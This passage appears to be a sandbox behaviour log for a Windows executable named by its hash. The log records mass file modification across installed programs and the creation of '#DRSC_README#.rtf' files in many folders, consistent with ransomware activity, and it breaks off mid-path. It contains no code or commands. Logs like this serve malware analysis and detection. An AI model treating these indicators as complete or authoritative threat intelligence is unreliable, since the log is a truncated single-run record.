710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\Welcome.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluEmptyFolder_160.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\new_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\chrome.7z 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\welcome-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository_1.2.100.v20131209-2144.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_removeme-default_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_listview.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\s_radio_selected_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ro.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\review_poster.jpg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh.htm 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.sun.el_2.2.0.v201303151357.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.emf.common_2.10.1.v20140901-1043.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\bbc_co_uk.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\ind_prog.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.rcp_4.3.100.v20141007-2301.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.felix.gogo.shell_0.10.0.v201212101605.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Dark.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\rhp_world_icon_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\fil_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-sl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\AUTHORS.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\java.policy 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\icons_ie8.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\jfxrt.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\core_icons_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\RHP_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\java.security 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\pt-br_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation_1.2.100.v20131119-0908.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_highcontrast.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\rhp_world_icon_hover.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.commands_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-print.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_anonymoususer_24.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\checkmark.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\invalid32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-lib-profiler.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sw.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_zh_HK.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\FormatSubmit.ps1xml 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-io_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\jfr\default.jfc 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\rhp_world_icon_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome_100_percent.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\upsell.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_checkbox_unselected_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\javapackager.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\svgCheckboxUnselected.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\he.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\GrantSplit.wps 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-explorer_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-queries.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\ui.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\reduced_mode.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\rhp_world_icon_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files 